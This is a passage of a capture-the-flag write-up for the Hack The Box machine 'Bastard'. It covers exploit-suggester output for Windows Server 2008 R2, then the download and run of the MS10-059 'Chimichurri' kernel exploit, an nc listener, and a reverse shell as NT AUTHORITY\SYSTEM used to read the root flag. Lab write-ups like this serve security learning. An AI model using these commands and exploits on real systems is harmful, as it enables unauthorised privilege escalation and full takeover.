Date: 20101214 CVE: CVE-2010-3961 KB: KB2442962 Title: Vulnerability in Consent User Interface Could Allow Elevation of Privilege Affected product: Windows Server 2008 R2 for x64-based Systems Affected component: Severity: Important Impact: Elevation of Privilege Exploit: n/a
Date: 20110208 CVE: CVE-2010-4398 KB: KB2393802 Title: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege Affected product: Windows Server 2008 R2 for x64-based Systems Affected component: Severity: Important Impact: Elevation of Privilege Exploits: http://www.exploit-db.com/bypassing-uac-with-user-privilege-under-windows-vista7-mirror/, http://www.exploit-db.com/exploits/15609/
Date: 20111229 CVE: CVE-2011-3414 KB: KB2656355 Title: Vulnerabilities in .NET Framework Could Allow Elevation of Privilege Affected product: Windows Server 2008 R2 for x64-based Systems Affected component: Microsoft .NET Framework 3.5.1 Severity: Critical Impact: Elevation of Privilege Exploit: n/a
Date: 20111229 CVE: CVE-2011-3417 KB: KB2656355 Title: Vulnerabilities in .NET Framework Could Allow Elevation of Privilege Affected product: Windows Server 2008 R2 for x64-based Systems Affected component: Microsoft .NET Framework 3.5.1 Severity: Critical Impact: Elevation of Privilege Exploit: n/a
Date: 20111229 CVE: CVE-2011-3416 KB: KB2656355 Title: Vulnerabilities in .NET Framework Could Allow Elevation of Privilege Affected product: Windows Server 2008 R2 for x64-based Systems Affected component: Microsoft .NET Framework 3.5.1 Severity: Critical Impact: Elevation of Privilege Exploit: n/a
Date: 20110712 CVE: CVE-2011-1870 KB: KB2507938 Title: Vulnerabilities in Windows Client/Server Run-time Subsystem Could Allow Elevation of Privilege Affected product: Windows Server 2008 R2 for x64-based Systems Affected component: Severity: Important Impact: Elevation of Privilege Exploit: n/a
Date: 20120508 CVE: CVE-2012-0178 KB: KB2690533 Title: Vulnerability in Windows Partition Manager Could Allow Elevation of Privilege Affected product: Windows Server 2008 R2 for x64-based Systems Affected component: Severity: Important Impact: Elevation of Privilege Exploit: n/a
Date: 20110614 CVE: CVE-2011-1264 KB: KB2518295 Title: Vulnerability in Active Directory Certificate Services Web Enrollment Could Allow Elevation of Privilege Affected product: Windows Server 2008 R2 for x64-based Systems Affected component: Severity: Important Impact: Elevation of Privilege Exploit: n/a
Date: 20110809 CVE: CVE-2011-1263 KB: KB2546250 Title: Vulnerability in Remote Desktop Web Access Could Allow Elevation of Privilege Affected product: Windows Server 2008 R2 for x64-based Systems Affected component: Severity: Important Impact: Elevation of Privilege Exploit: n/a
[+] Missing patches: 23 - KB2507938: patches 5 vulnerabilities - KB2840149: patches 4 vulnerabilities - KB2742598: patches 4 vulnerabilities - KB2808735: patches 4 vulnerabilities - KB2756920: patches 4 vulnerabilities - KB2807986: patches 3 vulnerabilities - KB2656355: patches 3 vulnerabilities - KB2813170: patches 2 vulnerabilities - KB2393802: patches 2 vulnerabilities - KB2645640: patches 2 vulnerabilities - KB982799: patches 2 vulnerabilities - KB2709715: patches 2 vulnerabilities - KB2425227: patches 2 vulnerabilities - KB2790113: patches 1 vulnerability - KB2442962: patches 1 vulnerability - KB2518295: patches 1 vulnerability - KB2789644: patches 1 vulnerability - KB2620712: patches 1 vulnerability - KB2778930: patches 1 vulnerability - KB2305420: patches 1 vulnerability - KB2690533: patches 1 vulnerability - KB2546250: patches 1 vulnerability - KB2571621: patches 1 vulnerability [+] KB with the most recent release date - ID: KB2840149 - Release date: 20130409
[+] Done. Displaying 49 of the 207 vulnerabilities found.
MS10-059
u505@kali:~/HTB/Machines/Bastard$ wget https://github.com/egre55/windows-kernel-exploits/raw/master/MS10-059:%20Chimichurri/Compiled/Chimichurri.exe --2020-03-14 19:19:53-- https://github.com/egre55/windows-kernel-exploits/raw/master/MS10-059:%20Chimichurri/Compiled/Chimichurri.exe Resolving github.com (github.com)... 192.30.253.113 Connecting to github.com (github.com)|192.30.253.113|:443... connected. HTTP request sent, awaiting response... 302 Found Location: https://raw.githubusercontent.com/egre55/windows-kernel-exploits/master/MS10-059%3A%20Chimichurri/Compiled/Chimichurri.exe [following] --2020-03-14 19:19:53-- https://raw.githubusercontent.com/egre55/windows-kernel-exploits/master/MS10-059%3A%20Chimichurri/Compiled/Chimichurri.exe Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 199.232.0.133 Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|199.232.0.133|:443... connected. HTTP request sent, awaiting response... 200 OK Length: 784384 (766K) [application/octet-stream] Saving to: ‘Chimichurri.exe’
Chimichurri.exe 100%[===================>] 766.00K --.-KB/s in 0.09s
2020-03-14 19:19:54 (8.13 MB/s) - ‘Chimichurri.exe’ saved [784384/784384]
Teh listener on port 4445
u505@kali:~/HTB/Machines/Bastard$ rlwrap nc -lnvp 4445 Ncat: Version 7.80 ( https://nmap.org/ncat ) Ncat: Listening on :::4445 Ncat: Listening on 0.0.0.0:4445
Run the exploit
C:\inetpub\drupal-7.54>Chimichurri.exe 10.10.14.21 4445 Chimichurri.exe 10.10.14.21 4445 /Chimichurri/-->This exploit gives you a Local System shell
/Chimichurri/-->Changing registry values...
/Chimichurri/-->Got SYSTEM token...
/Chimichurri/-->Running reverse shell...
/Chimichurri/-->Restoring default registry values...
The reverse shell as NT authority is opened.
u505@kali:~/HTB/Machines/Bastard$ rlwrap nc -lnvp 4445 Ncat: Version 7.80 ( https://nmap.org/ncat ) Ncat: Listening on :::4445 Ncat: Listening on 0.0.0.0:4445 Ncat: Connection from 10.10.10.9. Ncat: Connection from 10.10.10.9:49183. Microsoft Windows [Version 6.1.7600] Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\inetpub\drupal-7.54>whoami whoami nt authority\system
Root Flag
C:\inetpub\drupal-7.54>type c:\Users\Administrator\Desktop\root.txt.txt type c:\Users\Administrator\Desktop\root.txt.txt <ROOT_FLAG>
References
- DRUPAL 7.X SERVICES MODULE UNSERIALIZE() TO RCE
- What is URL Encoding and How does it work?
- windows-kernel-exploits
- Microsoft Security Bulletin MS10-059 - Important
Daniel Simao 09:27, 11 March 2020 (EDT)
